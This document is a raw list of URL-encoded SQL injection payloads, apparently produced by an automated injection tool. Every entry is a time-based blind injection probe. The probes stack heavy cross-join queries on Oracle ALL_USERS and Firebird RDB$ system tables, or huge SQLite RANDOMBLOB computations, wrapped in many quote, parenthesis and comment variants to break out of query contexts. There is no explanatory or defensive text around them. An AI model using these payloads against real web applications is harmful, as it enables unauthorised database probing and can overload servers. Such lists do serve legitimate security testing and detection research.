1%25%27%29%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%25%27%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%00%27%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%00%27%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%20WHERE%207190%3D7190%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%29%20WHERE%209457%3D9457%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%20WHERE%203080%3D3080%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%20WHERE%209710%3D9710%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%7C%7C%28SELECT%20%27NQmj%27%20FROM%20DUAL%20WHERE%202051%3D2051%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%7C%7C%28SELECT%20%27BWWM%27%20WHERE%205482%3D5482%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%2B%28SELECT%20RXSl%20WHERE%208872%3D8872%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%2B%28SELECT%20%27VAKt%27%20WHERE%206062%3D6062%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%20IN%20BOOLEAN%20MODE%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%285347%3D5347 1%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%281236%3D1236 1%29%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%282129%3D2129 1%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1%29%20WHERE%202898%3D2898%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1%20WHERE%203405%3D3405%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1%27%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1%27%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1%22%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 1%27%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27XmdL%27%3D%27XmdL 1%27%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27qQHV%27%3D%27qQHV 1%27%29%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27dNbz%27%3D%27dNbz 1%27%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27bcfP%27%3D%27bcfP 1%27%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27vvbq%27%20LIKE%20%27vvbq 1%27%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27RgAL%27%20LIKE%20%27RgAL 1%27%29%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27ervt%27%20LIKE%20%27ervt 1%27%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27XNbz%27%20LIKE%20%27XNbz 1%22%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22NxDg%22%3D%22NxDg 1%22%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22PORs%22%3D%22PORs 1%22%29%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22PjaH%22%3D%22PjaH 1%22%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22CpEU%22%3D%22CpEU 1%22%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22KVLs%22%20LIKE%20%22KVLs 1%22%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22CHZX%22%20LIKE%20%22CHZX 1%22%29%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22USWB%22%20LIKE%20%22USWB 1%22%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22obet%22%20LIKE%20%22obet 1%25%27%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27OjYZ%27%3D%27OjYZ 1%00%27%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27XFJY%27%3D%27XFJY 1%27%29%20WHERE%205929%3D5929%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1%22%29%20WHERE%202208%3D2208%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1%27%20WHERE%204388%3D4388%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1%22%20WHERE%202094%3D2094%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 1%27%7C%7C%28SELECT%20%27mJtU%27%20FROM%20DUAL%20WHERE%209357%3D9357%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27EkZP%27%20WHERE%206165%3D6165%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%7C%7C%27 1%27%2B%28SELECT%20caZY%20WHERE%206286%3D6286%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27OEqJ%27%20WHERE%205427%3D5427%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208282%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%23 1%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%20WHERE%204496%3D4496%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%20WHERE%208746%3D8746%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%25%27%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%25%27%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%25%27%29%29%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%25%27%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%00%27%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%00%27%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%20WHERE%206936%3D6936%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%20WHERE%206646%3D6646%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%20WHERE%207056%3D7056%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%20WHERE%207015%3D7015%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%7C%7C%28SELECT%20%27CXpP%27%20FROM%20DUAL%20WHERE%203903%3D3903%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%7C%7C%28SELECT%20%27dXvp%27%20WHERE%204831%3D4831%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%2B%28SELECT%20tnOd%20WHERE%206074%3D6074%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%2B%28SELECT%20%27BWXJ%27%20WHERE%207850%3D7850%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%20IN%20BOOLEAN%20MODE%29%20AND%201596%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%286837%3D6837 1%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%287264%3D7264 1%29%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%282942%3D2942 1%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1%29%20WHERE%208058%3D8058%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1%20WHERE%205992%3D5992%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1%27%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1%27%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1%22%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1%27%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27KYPh%27%3D%27KYPh 1%27%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27pcPr%27%3D%27pcPr 1%27%29%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27GVNh%27%3D%27GVNh 1%27%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27KSdX%27%3D%27KSdX 1%27%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27QCpg%27%20LIKE%20%27QCpg 1%27%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27afPt%27%20LIKE%20%27afPt 1%27%29%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27mqwZ%27%20LIKE%20%27mqwZ 1%27%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27zzZX%27%20LIKE%20%27zzZX 1%22%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22zhAB%22%3D%22zhAB 1%22%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22HDEp%22%3D%22HDEp 1%22%29%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22gpcd%22%3D%22gpcd 1%22%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22ZzrP%22%3D%22ZzrP 1%22%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22elIR%22%20LIKE%20%22elIR 1%22%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22RogQ%22%20LIKE%20%22RogQ 1%22%29%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22XFzs%22%20LIKE%20%22XFzs 1%22%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22HNfo%22%20LIKE%20%22HNfo 1%25%27%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27mPyq%27%3D%27mPyq 1%00%27%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27mGPk%27%3D%27mGPk 1%27%29%20WHERE%209798%3D9798%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1%22%29%20WHERE%206982%3D6982%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1%27%20WHERE%207727%3D7727%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1%22%20WHERE%206599%3D6599%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1%27%7C%7C%28SELECT%20%27udCv%27%20FROM%20DUAL%20WHERE%206127%3D6127%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27miGa%27%20WHERE%201261%3D1261%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%7C%7C%27 1%27%2B%28SELECT%20jLqF%20WHERE%207175%3D7175%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%2B%27 1%27%2B%28SELECT%20%27EPhj%27%20WHERE%203290%3D3290%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%2B%27 